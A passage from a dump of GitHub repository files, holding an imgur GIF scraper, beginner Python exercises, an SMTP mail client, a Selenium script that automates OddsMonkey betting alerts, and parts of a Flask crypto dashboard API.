Añadimos terminación, a ver si cuela.\"\n\t\t\t\tprint name\n\t\t\t\tprint url\n\t\t\t\tname += \".gif\"\n\t\t\t\turl = \"http://i.imgur.com/\" + name\n\t\t\t\t\n\t\t\t# Si no tenemos ya la imagen, la descargamos.\n\t\t\tif (not dicc.has_key(url)):\n\t\t\t\tdicc[url] = name\n\t\t\t\tconnection_ddbb.insert_into_table(url, name)\n\t\t\t\tif save: urllib.urlretrieve(url, PATH + name)\n\n\n\texcept Exception as exc:\n\t\tprint \"Exception Out:\", exc\n\n\tfinally:\n\t\tprint \"Cerramos base de datos en el finally.\"\n\t\tconnection_ddbb.disconnect()\n\t\ttime.sleep(TIME_SLEEP)\n\n\"\"\"\n\tEncuentra las mejores imágenes de la última hora.\n\"\"\"\ndef get_top_from_hour(num=LIMIT):\n\tget_top(GET_TOP_HOUR, num)\n\n\"\"\"\n\tEncuentra las mejores imágenes del día.\n\"\"\"\ndef get_top_from_day(num=LIMIT):\n\tget_top(GET_TOP_DAY, num)\n\n\"\"\"\n\tEncuentra las mejores imágenes de la semana.\n\"\"\"\ndef get_top_from_week(num=LIMIT):\n\tget_top(GET_TOP_WEEK, num)\n\n\"\"\"\n\tEncuentra las mejores imágenes del mes.\n\"\"\"\ndef get_top_from_month(num=LIMIT):\n\tget_top(GET_TOP_MONTH, num)\n\n\"\"\"\n\tDevuelve un diccionario con el contenido de la DDBB.\n\"\"\"\ndef createDiccFromDB():\n\tconnection_ddbb = ddbb.pruebaMYSQL()\n\trows = connection_ddbb.get_all_rows()\n\tconnection_ddbb.disconnect()\n\t\n\tdiccionario = {}\n\tfor row in rows: diccionario[row[0]] = row[1]\n\t\n\tprint \"Diccionario tiene %d elementos.\" % len(diccionario)\n\treturn diccionario\n\ndef main():\n\t#createDiccFromDB()\n\tget_top_from_month()\n\tget_top_from_week()\n\tget_top_from_day()\n\tget_top_from_hour()\n\tget_random_submission()\n\n\nmain()" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 12.5, "blob_id": "ebec1099ade75ed5dc05347927048a0e190598a6", "content_id": "32b8f37c8b85088a1a95fefb80c7ce2b38eca5e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 54, "license_type": "no_license", "max_line_length": 30, "num_lines": 4, "path": "/README.md", "repo_name": "alexroyar/random-gif", "src_encoding": "UTF-8", "text": "random-gif\n==========\n\nApp android para recibir gifs.\n" } ]
3
IT-17005/Python-Tutorial
https://github.com/IT-17005/Python-Tutorial
ee7d39556dbaec1303b6c520fca0937662fe14ed
21c80279ef435b22d63cac6fcc53678b625618e4
54274d699ccb95c7f2777b5b85ea86dbb6a673e9
refs/heads/main
2023-03-11T11:59:47.780708
2021-03-03T05:23:49
2021-03-03T05:23:49
343,999,243
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.580110490322113, "alphanum_fraction": 0.6049723625183105, "avg_line_length": 19.16666603088379, "blob_id": "42eacc385e555e8f5ab0e8789833b4f4a240f5a2", "content_id": "50e0a4acead0448c4f5ac5d8dbe5cca377bbdb21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 43, "num_lines": 18, "path": "/venv/countNumLetterWord.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "s = input(\"Enter the Text:\")\nnumOfDigit=0\nnumOfletter=0\nnumOfWord=0\nfor i in s:\n i=i.lower()\n if i>='a' and i<='z':\n numOfletter+=1\n\n elif i>='0' and i<='9':\n numOfDigit+=1\n\n elif i==' ':\n numOfWord+=1\n\nprint(\"The number of words:\",numOfWord+1)\nprint(\"The number of letters:\",numOfletter)\nprint(\"The number of Digit:\",numOfDigit)" }, { "alpha_fraction": 0.5780141949653625, "alphanum_fraction": 0.5992907881736755, "avg_line_length": 24.636363983154297, "blob_id": "87699db415633f2957a9a34212bb3f29538a98a6", "content_id": "d2a3a50baa70bac1433b0a889df5ae750f1a04ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 282, "license_type": "no_license", "max_line_length": 54, "num_lines": 11, "path": "/venv/GuessingGame.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "from random import randint\n\nfor x in range(1,6):\n num = int(input(\"Enter any number between 1-5: \"))\n randNum = randint(1,5)\n if num == randNum:\n print(\"I've Won the Game.\")\n else:\n print(\"I've lose the Game.\")\n\n print(\"The random number was:\",randNum)\n" }, { "alpha_fraction": 0.41791045665740967, "alphanum_fraction": 0.5074626803398132, "avg_line_length": 14, "blob_id": "901ca3d7dd5c304a8c7c8a8a7dc9689e320b327a", "content_id": "c9574447271349007cc3d8e99776d0053c675bca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 19, "num_lines": 9, "path": "/venv/matrix.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "matrix = [\n [1,1,2],\n [3,67,8],\n]\nmatrix[0][1] = 3\nprint(matrix[0][1])\nfor row in matrix:\n for col in row:\n print(col)" }, { "alpha_fraction": 0.4681818187236786, "alphanum_fraction": 0.5772727131843567, "avg_line_length": 21.100000381469727, "blob_id": "0f55c796a1e448327a22967ca7f33675e30100ad", "content_id": "4a706659fd76970498acedd767e4c6a667031083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/venv/dictionary.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "student = {\n 101 : \"RUHAN\",\n \"102\" : \"Abdullah\",\n \"103\" : \"sultan\",\n \"104\" : \"ridom\",\n}\nprint(student.get(\"102\"))\nprint(student.get(\"103\"))\nprint(student.get(101))\nprint(student.get(\"106\",\"Not a valid key.\"))" }, { "alpha_fraction": 0.3642384111881256, "alphanum_fraction": 0.46357616782188416, "avg_line_length": 14.100000381469727, "blob_id": "758524f2dddfaf8744f36611f192c369a358135a", "content_id": "2d532be9d00d5bf910dff254cb396bd0e564767d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 32, "num_lines": 10, "path": "/venv/forloop.py", "repo_name": 
"IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num = [2, 23, 4, 24, 54, 31, 12]\nl = len(num)\ni = 0\n# while i < l:\n# print(num[i])\n# i += 1\nsum = 0\nfor x in num:\n sum = sum + x\nprint(sum)\n" }, { "alpha_fraction": 0.447761207818985, "alphanum_fraction": 0.5746268630027771, "avg_line_length": 12.5, "blob_id": "0e7c72839b8801c2917dbd22f57a36b6cb6d4090", "content_id": "d47e906860f7afd538d2ccec4676cbb261578e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/venv/xargs.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "#xargs(tuples)\ndef sum(*numbers):\n s=0\n for num in numbers:\n s=s+num\n print(s)\n\nsum(10,20)\nsum(10,20,45)\nsum(10,20,68)" }, { "alpha_fraction": 0.49056604504585266, "alphanum_fraction": 0.5408805012702942, "avg_line_length": 19, "blob_id": "760ef5212191b958224250c19e02f570a51f5b89", "content_id": "9fd7b9b81669c42be9a68693fa15ee0d9e27c134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "no_license", "max_line_length": 53, "num_lines": 8, "path": "/venv/series.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "# 1+2+3+4+.......+n\n\nn= int(input(\"Enter the last number of the series:\"))\nsum=0\nfor x in range(1,n+1,1):\n sum+=x\n print(f\"{sum} +\",end=\" \")\n# print(sum)" }, { "alpha_fraction": 0.3181818127632141, "alphanum_fraction": 0.47727271914482117, "avg_line_length": 13, "blob_id": "4de908b14eebb20c22cdb207491a91c7a43fb91f", "content_id": "7d28b2e1a5d33d16a36da4e53d81c484304d614b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/venv/whileloop.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num = [2,23,4,24,54,31,12]\nl = len(num)\ni = 0\nwhile i<l:\n print(num[i])\n i+=1\n " }, { "alpha_fraction": 0.5798319578170776, "alphanum_fraction": 0.6386554837226868, "avg_line_length": 16.14285659790039, "blob_id": "e0f3811fcc65e588c8f476b0375b198ede7e687f", "content_id": "f682c6cc908f0298b38faffa44fbdc20feee2e16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 30, "num_lines": 7, "path": "/map.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "# map(function, list)\ndef square(x):\n return x*x\n\nnum = [1,2,3,4,5,6,7]\nresult = list(map(square,num))\nprint(result)" }, { "alpha_fraction": 0.5660377144813538, "alphanum_fraction": 0.650943398475647, "avg_line_length": 12.375, "blob_id": "dbe9ab452ef62ce43a9c6ba9b1449207a7af000a", "content_id": "ceed7fba8e48edcfb6956e120b6b2279b33c8c76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 106, "license_type": "no_license", "max_line_length": 25, "num_lines": 8, "path": "/venv/Range.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num = list(range(10))\nprint(num)\n\nnum = list(range(1,10))\nprint(num)\n\nnum = list(range(1,10,2))\nprint(num)" }, { "alpha_fraction": 0.5267175436019897, "alphanum_fraction": 0.5877862572669983, "avg_line_length": 13.666666984558105, "blob_id": "db6c9f3d6b92d93546bf6aaeab276f01d400e4e7", "content_id": 
"0f1d988285e2f9830dd2ad213eeb3e4f4551c95e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 131, "license_type": "no_license", "max_line_length": 23, "num_lines": 9, "path": "/venv/tuples.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "student = (\n \"ruhan\",\n (\"abdul karim\",27,3.66),\n \"masud\"\n)\nprint(student)\nprint(student[0])\nprint(student[2])\nprint(student[1])" }, { "alpha_fraction": 0.47560974955558777, "alphanum_fraction": 0.6524389982223511, "avg_line_length": 15.5, "blob_id": "1b37747c2e1cc6e118c6c7b6abff80b3a11673a7", "content_id": "3bdb91ed5d30e2009c9d238d02ee532e2db3ce58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 22, "num_lines": 10, "path": "/venv/set.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "num1 = {1,2,3,4,5,6}\nnum2 = set([1,2,38,9])\nnum1.add(11)\nnum1.remove(11)\nprint(11 not in num1)\nprint(num2)\n\nprint(num1 | num2)\nprint(num1 & num2)\nprint(num1 - num2)" }, { "alpha_fraction": 0.6356275081634521, "alphanum_fraction": 0.6437246799468994, "avg_line_length": 19.66666603088379, "blob_id": "1b41f02ca0c4968c176997fcf436d3e80e33414f", "content_id": "2ad12ea3339df420a7ea4971293edb00b122adf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 269, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/venv/stack.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "books = []\nbooks.append(\"সি++\")\nbooks.append(\"জাভা\")\nbooks.append(\"পাইথন\")\nprint(books)\nbooks.pop()\nprint(\"Now the top books is:\",books[-1])\nbooks.pop()\nprint(\"Now the top books is:\",books[-1])\nbooks.pop()\nif not books:\n print(\"No books left.\")" }, { "alpha_fraction": 0.5309734344482422, "alphanum_fraction": 0.5752212405204773, "avg_line_length": 15.142857551574707, "blob_id": "49c80d9d3002df6a949630a02a35ca800ccfbb80", "content_id": "b6345bf3b44e6e2307de4bf4f3d965995a72c228", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 23, "num_lines": 7, "path": "/venv/debug.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "#xargs(tuples)\ndef sum(*numbers):\n s=0\n for num in numbers:\n s=s+num\n return s\nprint(sum(10,20))\n" }, { "alpha_fraction": 0.6927374005317688, "alphanum_fraction": 0.6927374005317688, "avg_line_length": 17, "blob_id": "2159d45c19191b8857aabbc95e0a42ce34a71a62", "content_id": "28ce104731fdb26717853e3c6f20b4c18a7ae05c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 29, "num_lines": 10, "path": "/venv/queue.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "from collections import deque\nname = deque([\"x\",\"y\",\"z\"])\nprint(name)\nname.popleft()\nprint(name)\nname.popleft()\nprint(name)\nname.popleft()\nif not name:\n print(\"No person left\")" }, { "alpha_fraction": 0.4888888895511627, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 21.66666603088379, "blob_id": "9902ca409c84aa4afe8bb9cdec4afab52a97fcae", "content_id": "aa969a2e83f4c2e4355549c9213fc28fcc3c2ee1", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 135, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/venv/stringToNum.py", "repo_name": "IT-17005/Python-Tutorial", "src_encoding": "UTF-8", "text": "n = input(\"Enter a text of number:\")#12 12 32 43 54\nlist = n.split()#12, 12, 32, 43\nsum=0\nfor num in list:\n sum+=int(num)\nprint(sum)" } ]
16
Alirezaprogramerrd99/SMTP-MailClient
https://github.com/Alirezaprogramerrd99/SMTP-MailClient
da676b87d8f71f2569174d74d2fe8d5a0a4a6bde
a6d75ddd8521118d667bfda71bfe85d6ae50baf0
5762029336a12b0fca1f235db8334e7d88930a79
refs/heads/main
2023-04-08T22:44:44.299888
2021-04-19T17:27:33
2021-04-19T17:27:33
359,542,078
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6199480295181274, "alphanum_fraction": 0.6549279093742371, "avg_line_length": 31.0546875, "blob_id": "b7578dc700a9b818b169994be38dd4353bad4226", "content_id": "db539c1dbcc2c535bf1d1876db9171a9f7a16804", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4231, "license_type": "no_license", "max_line_length": 86, "num_lines": 128, "path": "/SMTP-MailClient.py", "repo_name": "Alirezaprogramerrd99/SMTP-MailClient", "src_encoding": "UTF-8", "text": "from socket import *\r\nimport ssl\r\nimport base64\r\n\r\n# ------------------------- SMTP Commands -------------------------------\r\nEND_MSG = \"\\r\\n.\\r\\n\"\r\nFORMAT = 'ascii'\r\nQUIT_CMD = 'QUIT\\r\\n'\r\nHELLO_CMD = 'HELO gmail.com\\r\\n'\r\nSTARTTLS_CMD = 'STARTTLS\\r\\n'\r\nAUTHORIZATION_CMD = \"AUTH LOGIN\\r\\n\"\r\nMAIL_FROM = 'MAIL FROM: <Sender@gmail.com> \\r\\n' # fill this part with sender's gmail address.\r\nRCPT_TO = 'RCPT TO: <Receiver@gmail.com> \\r\\n' # fill this part with receiver's gmail address.\r\nDATA_CMD = 'DATA\\r\\n'\r\n# ------------------------------------------------------------------------\r\n\r\nlogin_username = 'Example@gmail.com' # your gmail username (sender gmail.)\r\nlogin_password = 'blablabla' # your gmail password\r\n# ------------------------------------------------------------------------\r\n\r\n# tuple = server hostname , connection port from server.\r\nmailserver1 = (\"smtp.gmail.com\", 587)\r\n\r\n# Create socket called clientSocket and establish a TCP connection with mailserver\r\nclientSocket = socket(AF_INET, SOCK_STREAM)\r\nclientSocket.connect(mailserver1)\r\n\r\nrecv = clientSocket.recv(1024).decode(FORMAT)\r\n\r\nprint(\"\\nServer message after connection request: \" + recv)\r\nif recv[:3] != '220':\r\n print('220 reply not received from server.')\r\n\r\n# ----Send HELO command and print server response.\r\n\r\nclientSocket.send(HELLO_CMD.encode())\r\nrecv1 = clientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after HELO: ' + recv1)\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not received from server.')\r\n\r\n# ----start TLS\r\nclientSocket.send(STARTTLS_CMD.encode())\r\nrecv = clientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after STARTTLS: ' + recv)\r\n\r\nif recv[:3] != '220':\r\n print(\"220 reply not received from server.\")\r\n\r\n# ----Secure socket with ssl\r\nsslClientSocket = ssl.wrap_socket(clientSocket)\r\n\r\n# ----user authentication part\r\nsslClientSocket.send(AUTHORIZATION_CMD.encode())\r\nrecv = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after AUTH LOGIN: ' + recv)\r\n\r\nif recv[:3] != '334':\r\n print(\"334 Not received from the server\")\r\n\r\n# ----sending username for authorization\r\n\r\nsslClientSocket.send(\r\n (base64.b64encode(login_username.encode())) + '\\r\\n'.encode())\r\nrecv = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after sending username: ' + recv)\r\n\r\n# ----sending username for authorization\r\nsslClientSocket.send(\r\n (base64.b64encode(login_password.encode())) + '\\r\\n'.encode())\r\nrecv = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint('Server response after sending password: ' + recv)\r\n\r\nif recv[:3] != '235':\r\n print(\"235 Not received from the server\")\r\n\r\n\r\nsslClientSocket.send(MAIL_FROM.encode())\r\nrecv2 = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint(\"Server response After MAIL FROM command: \"+recv2)\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not 
received from server.')\r\n\r\n# ----Send RCPT TO command and print server response.\r\n\r\nsslClientSocket.send(RCPT_TO.encode())\r\nrecv3 = sslClientSocket.recv(1024).decode()\r\nprint(\"Server response After RCPT TO command: \"+recv3)\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not received from server.')\r\n\r\n# ----Send DATA command and print server response.\r\n\r\nsslClientSocket.send(DATA_CMD.encode())\r\nrecv4 = sslClientSocket.recv(1024).decode(FORMAT)\r\nprint(\"Server response After DATA command: \" + recv4)\r\n\r\nif recv4[:3] != '354':\r\n print('354 reply not received from server.')\r\n\r\n# ----Send message data.\r\nsubject = \"Subject: SMTP mail client testing \\r\\n\\r\\n\"\r\nsslClientSocket.send(subject.encode())\r\nmessage = input(\"\\nEnter your message: \")\r\nmessage = (str(message) + '\\r\\n').encode()\r\n\r\nsslClientSocket.send(message)\r\nsslClientSocket.send(END_MSG.encode())\r\nrecv_msg = sslClientSocket.recv(1024)\r\n\r\nprint(\"\\nServer response after sending message body: \" + recv_msg.decode())\r\n\r\nif recv1[:3] != '250':\r\n print('250 reply not received from server.')\r\n\r\n# ----Send QUIT command and get server response.\r\nsslClientSocket.send(QUIT_CMD.encode())\r\nmessage = sslClientSocket.recv(1024)\r\nprint('Server response after QUIT: ' + message.decode())\r\n\r\nif message[:9] != '221 2.0.0':\r\n print('221 2.0.0 Not received from the server')\r\n\r\nsslClientSocket.close()\r\nprint('Email sent successfully :)')\r\n" } ]
1
iholdroyd/oddsmonkey_eachway_calculator_automation
https://github.com/iholdroyd/oddsmonkey_eachway_calculator_automation
ae37d52c749772412b3a359ab61d1f400a9364e1
6f93340e897e053c4dfa9af70e5f72955d919759
55cdcb2b3b3f755bfe23883f630d0fc666bd1858
refs/heads/master
2022-12-02T23:02:22.303058
2020-08-16T18:45:19
2020-08-16T18:45:19
276,960,121
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6271089315414429, "alphanum_fraction": 0.6525593400001526, "avg_line_length": 52, "blob_id": "977c12c2b5be6908f3158363066c1afc920ff464", "content_id": "5b96806a6acdb1b0b195f04cd6631e416a18a0a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3497, "license_type": "no_license", "max_line_length": 176, "num_lines": 66, "path": "/script.py", "repo_name": "iholdroyd/oddsmonkey_eachway_calculator_automation", "src_encoding": "UTF-8", "text": "from selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys\nimport time\nfrom selenium.webdriver.chrome.options import Options\nimport os\nimport datetime\n\nUSERNAME = #yourusername\nPASSWORD = #yourpassword\nTIMEDIFFERENCE = 5\nCHROMEDRIVER_PATH= #path to your chromedriver. E.g. mine is '/Users/ian/Downloads/chromedriver.\n\ndef notify(title, subtitle, message):\n t = '-title {!r}'.format(title)\n s = '-subtitle {!r}'.format(subtitle)\n m = '-message {!r}'.format(message)\n os.system('terminal-notifier {}'.format(' '.join([m, t, s])))\n\ndef is_time_in_5(race):\n race = str(race).split(\" \")\n racetime= race[1]\n racetime = datetime.datetime.strptime(racetime, '%H:%M')\n timein5 = datetime.datetime.now() + datetime.timedelta(minutes=TIMEDIFFERENCE)\n timein5 = timein5.strftime(\"%H:%M\")\n timein5 = datetime.datetime.strptime(timein5, '%H:%M')\n return racetime <= timein5\n\n\n#login and navigate to the eachway matcher\noptions = Options()\noptions.add_argument(\"--disable-notifications\")\ndriver = webdriver.Chrome(executable_path=CHROMEDRIVER_PATH, chrome_options=options)\ndriver.get('https://www.oddsmonkey.com/Tools/Matchers/EachwayMatcher.aspx') \ndriver.find_element_by_name(\"dnn$ctr433$Login$Login_DNN$txtUsername\").send_keys(USERNAME)\ndriver.find_element_by_name(\"dnn$ctr433$Login$Login_DNN$txtPassword\").send_keys(PASSWORD)\ndriver.find_element_by_name(\"dnn$ctr433$Login$Login_DNN$txtPassword\").send_keys(Keys.ENTER) \n\nwhile True:\n t_end = time.time() + 60 * 10\n while time.time() < t_end:\n time.sleep(5)\n driver.get('https://www.oddsmonkey.com/Tools/Matchers/EachwayMatcher.aspx') \n #sort by SNR rating\n driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/thead/tr/th[18]/a\").click()\n time.sleep(5)\n\n #select extraplace\n driver.find_element_by_xpath(\"/html/body/form[1]/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[1]/div/div/div/div/ul/li[2]/a/span/span/span/span\").click()\n\n #autorefresh every minute\n driver.find_element_by_xpath(\"/html/body/form[1]/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[1]/div/div/div/div/ul/li[8]/div/button[2]\").click()\n time.sleep(3)\n driver.find_element_by_xpath(\"/html/body/form[1]/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[1]/div/div/div/div/ul/li[8]/div/ul/li[1]/a\").click()\n\n while True:\n try:\n race = driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[8]\").text\n if is_time_in_5 (race) == False:\n rating = driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[17]\").text\n odds = driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[13]\").text\n arbrating = 
driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[19]\").text\n notify(title = \"Rating: {}\".format(rating), subtitle = \"Race: {}\".format(race), message = \"Odds: {} Arb Rating : {}\".format(odds, arbrating))\n print(race)\n except: \n Exception\n time.sleep(60)" }, { "alpha_fraction": 0.8052805066108704, "alphanum_fraction": 0.8085808753967285, "avg_line_length": 49.5, "blob_id": "7d2a69402c79b80ee3eeaba6c57c6c3e7506d094", "content_id": "ffc17070ae96c8802099cfbfb04a265f0b6ed71e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 303, "license_type": "no_license", "max_line_length": 124, "num_lines": 6, "path": "/README.md", "repo_name": "iholdroyd/oddsmonkey_eachway_calculator_automation", "src_encoding": "UTF-8", "text": "# oddsmonkey_eachway_calculator_automation\nThis script allows automation of the oddsmonkey eachway calculator.\n\nA decent description of the use of this, and how i built it can be found at http://www.advancedmatchedbetting.com/blogpost/0\n\nFor anyone wanting to discus this, please feel free to email me!\n" } ]
2
robinvanleeuwen/bitcoin-api
https://github.com/robinvanleeuwen/bitcoin-api
1510031142f9380034db506a5226c42a67834d80
9c4150769f8d967f1a16a27912189b88f7e8fbcd
848057365ed4bed4869d2582f6755e0ea5ddebbd
refs/heads/master
2022-12-09T20:26:06.955000
2021-04-20T19:24:42
2021-04-20T19:24:42
201,117,544
2
0
null
2019-08-07T19:47:20
2022-09-24T23:21:37
2022-12-08T05:59:19
Jupyter Notebook
[ { "alpha_fraction": 0.7615384459495544, "alphanum_fraction": 0.7615384459495544, "avg_line_length": 20.66666603088379, "blob_id": "4479f02f1e3ebd4a5110981acd192c676e80bfa4", "content_id": "275d337e77a6ad08a58befa6c94dc55e7950663d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/api/orders.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from flask import Blueprint\nfrom auth import LoginManager\n\nlogin_manager = LoginManager()\n\norders = Blueprint(\"orders\", __name__)\n" }, { "alpha_fraction": 0.5500950217247009, "alphanum_fraction": 0.561498761177063, "avg_line_length": 26.90151596069336, "blob_id": "df7afb0b39cae58acbffdadb4b0f0100b7b20d83", "content_id": "5758a932a101530d31c6576ed892f4c17cd8ed60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3683, "license_type": "no_license", "max_line_length": 87, "num_lines": 132, "path": "/app.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "\"\"\"\nUsage: app.py [-a] [(-o -i <integer>)] [-t] | --inspect\n\nDashboard API for crypto currency\n\nArguments:\n -a Run API\n -o Run OHLC websocket\n -i <int> OHLC interval in minutes\n -t Run ticker websocket\n -h Help\n --inspect Run inspector on ticker data\n\"\"\"\n\nimport os\nimport sys\nfrom time import sleep\n\nfrom flask import request, jsonify, render_template\nfrom flask_api import FlaskAPI\nfrom flask_cors import CORS, cross_origin\n\nfrom config import app_config\n\nfrom log import log\nfrom docopt import docopt\n\nimport threading\n\nconfig_name: str = os.getenv(\"APP_SETTINGS\")\n\nif config_name is None:\n log.error(\"Missing APP_SETTINGS= environment variable.\")\n sys.exit(0)\n\nif os.getenv(\"DATABASE_URL\") is None:\n log.error(\"Missing DATABASE_URL= environment variable.\")\n sys.exit(0)\n\n\ndef create_app() -> FlaskAPI:\n\n app: FlaskAPI = FlaskAPI(__name__)\n app.config.from_object(app_config[config_name])\n app.config['ENV'] = config_name\n return app\n\n\napp = create_app()\ncors = CORS(app, resources={r\"*\": {\"origins\": \"*\"}})\n\ndef main():\n\n from portfolio import Portfolio\n\n args = docopt(__doc__)\n\n if args[\"-i\"]:\n intervals = list()\n for i in args[\"-i\"].split(\",\"):\n try:\n intervals.append(int(i))\n except Exception as e:\n log.error(\"Could not interpret intervals, use comma-seperated list.\")\n sys.exit(1)\n\n if int(i) not in [0, 1,5,15,30,60,240]:\n log.error(\"Invalid ticker/OHLC interval use: 1, 5, 15, 30, 60 or 240.\")\n sys.exit(1)\n\n if args[\"-o\"]:\n from kraken_websocket import run_ohlc_websocket, kraken_rest_api_to_psql\n\n if intervals == 0:\n log.info(\"Retrieving all intervals\")\n for i in [1,5,15,30,60,240]:\n kraken_rest_api_to_psql(interval=i)\n log.info(\"...\")\n sys.stdout.flush()\n sleep(2)\n sys.exit(0)\n\n threads = list()\n for i in intervals:\n threads.append(threading.Thread(target=run_ohlc_websocket, args=(i,)))\n\n for t in threads:\n t.start()\n\n if args[\"-a\"]:\n from db import db\n db.init_app(app)\n from api.account import account_bp\n from api.orders import orders\n from api.ohlc import ohlc_bp\n\n @app.route(\"/login\", methods=['GET', 'POST', 'OPTIONS'])\n @cross_origin(allow_headers=['Content-Type'])\n def login() -> dict:\n from auth import LoginManager\n login_manager = LoginManager()\n return login_manager.login()\n\n # select t.token, u.name 
from tokens as t\n # join users as u on user_id = u.id\n # where u.name = 'banana'\n # order by timestamp desc\n # limit 1;\n return jsonify({\"token\": \"9b6e1d23-a656-4118-9037-ebf288536ad5\"})\n\n app.register_blueprint(account_bp, url_prefix=\"/account\")\n app.register_blueprint(orders, url_prefix=\"/orders\")\n app.register_blueprint(ohlc_bp, url_prefix=\"/graph\")\n app.run(debug=config_name != \"production\")\n\n if args[\"-t\"]:\n\n from kraken_websocket import run_ticker_websocket\n portfolio = Portfolio()\n\n thread = threading.Thread(target=run_ticker_websocket, args=(portfolio,))\n thread.start()\n\n if args[\"--inspect\"]:\n from kraken_inspect import run\n run()\n\n if not args[\"-a\"] and not args[\"-t\"] and not args[\"--inspect\"] and not args[\"-o\"]:\n print(__doc__)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6416938304901123, "alphanum_fraction": 0.6416938304901123, "avg_line_length": 21, "blob_id": "db4a6596277ba7b3c3c218a8d34503b38937be3a", "content_id": "9c341f9722e3b021e43352e5689a797e8cf50666", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "no_license", "max_line_length": 49, "num_lines": 14, "path": "/setup.py", "repo_name": 